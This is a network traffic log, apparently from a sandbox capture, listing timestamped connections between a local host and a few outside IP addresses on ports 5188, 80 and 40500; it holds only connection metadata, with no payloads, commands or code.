Dec 5, 2024 17:32:13.490931988 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.491684914 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.491746902 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.491791010 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.492886066 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.493077040 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.493113041 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.493784904 CET	40500	49799	176.67.79.229	192.168.2.11
Dec 5, 2024 17:32:13.494153976 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.494165897 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.494242907 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.495295048 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.495349884 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.495409966 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.496455908 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.496546030 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.496655941 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.498075962 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.498087883 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.498238087 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.498850107 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.499105930 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.499218941 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.500170946 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.500183105 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.500250101 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.501269102 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.501507998 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.501662016 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.502459049 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.502473116 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.502562046 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.503369093 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.503617048 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.503691912 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.503783941 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.503827095 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.505073071 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.505439043 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.505958080 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.506005049 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.506123066 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.506752968 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.507374048 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.507385969 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.507728100 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.508718014 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.508729935 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.508784056 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.509737968 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.510232925 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.510324001 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.510978937 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.511063099 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.511226892 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.511955976 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.512093067 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.512134075 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.513293982 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.513305902 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.513365984 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.514414072 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.514425993 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.514465094 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.515675068 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.515687943 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.515778065 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.516721964 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.516735077 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.516801119 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.518096924 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.518241882 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.518394947 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.519207954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.519267082 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.519335032 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.520252943 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.520333052 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.520633936 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.521796942 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.521812916 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.521850109 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.522663116 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.522763014 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.522798061 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.523827076 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.523901939 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.523936033 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.525001049 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.525105953 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.525331974 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.526736975 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.526842117 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.526891947 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.527662992 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.527853966 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.527947903 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.528614998 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.575386047 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.575619936 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.575670958 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.577929020 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.578001022 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.578047037 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.580495119 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.581911087 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.582077980 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.582098961 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.582114935 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.586929083 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.586992979 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.587028980 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.591995001 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.592101097 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.592159986 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.597022057 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.597083092 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.597110033 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.597145081 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.601916075 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.602067947 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.602114916 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.606810093 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.606869936 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.606946945 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.606987000 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.611993074 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.612101078 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.612281084 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.616858006 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.616914988 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.616936922 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.616971970 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.621444941 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.621495008 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.621606112 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.621648073 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.626396894 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.626437902 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.626442909 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.626471043 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.631242990 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.631319046 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.631382942 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.631419897 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.636154890 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.636207104 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.636254072 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.639883995 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.639933109 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.639981985 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.643697977 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.643811941 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.643857956 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.647578001 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.647615910 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.647670031 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.651396990 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.651494026 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.651539087 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.655251980 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.655376911 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.655422926 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.657840967 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.657907009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.657959938 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.658354044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.658674002 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.658772945 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.659051895 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.659167051 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.659210920 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.659337997 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.659770012 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.659873009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.660382986 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.660857916 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.660907984 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.660986900 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.662023067 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.662185907 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.662204027 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.663264036 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.663341999 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.663366079 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.664369106 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.664462090 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.664474964 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.665946960 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.666045904 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.666146994 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.666645050 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.666738033 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.666788101 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.667774916 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.667819977 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.667877913 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.668807983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.668854952 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.668977022 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.669994116 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.670080900 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.670135021 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.671132088 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.671209097 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.671209097 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.672257900 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.672313929 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.672317028 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.673391104 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.673463106 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.673527002 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.674535036 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.674652100 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.674719095 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.675659895 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.675753117 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.675791979 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.676780939 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.676817894 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.676929951 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.677930117 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.677988052 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.678035975 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.679136992 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.679181099 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.679227114 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.680182934 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.680294037 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.680413961 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.681313992 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.681363106 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.681370974 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.682459116 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.682538033 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.682539940 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.683635950 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.683695078 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.683713913 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.684765100 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.684848070 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.684890985 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.685925007 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.686000109 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.686038971 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.687087059 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.687199116 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.687342882 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.688169003 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.688218117 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.688268900 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.689496040 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.689533949 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.689542055 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.690623999 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.690737009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.690779924 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.691771030 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.691879988 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.692054987 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.693011999 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.693095922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.693171978 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.693945885 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.694047928 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.694128036 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.695014000 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.695067883 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.695143938 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.695372105 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.695425034 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.695467949 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.696253061 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.696274996 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.696311951 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.696389914 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.697335005 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.697417021 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.697434902 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.699179888 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.699357986 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.699495077 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.700026989 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.700146914 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.700187922 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.701216936 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.701263905 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.701283932 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.702331066 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.702433109 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.702491999 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.703258038 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.703299046 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.703353882 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.704303980 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.704338074 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.704941034 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.705229044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.705302000 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.705326080 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.706341982 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.706496954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.706543922 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.707571983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.707616091 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.707622051 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.708662987 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.708745003 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.709336996 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.709765911 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.709878922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.709880114 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.710916996 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.710968971 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.711052895 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.712168932 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.712210894 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.712229967 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.713177919 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.713238001 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.713293076 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.714337111 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.714384079 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.714411974 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.715446949 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.715625048 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.715643883 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.716605902 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.716655016 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.716703892 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.767981052 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.768038988 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.768101931 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.768166065 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.768199921 CET	49793	80	192.168.2.11	185.215.113.84
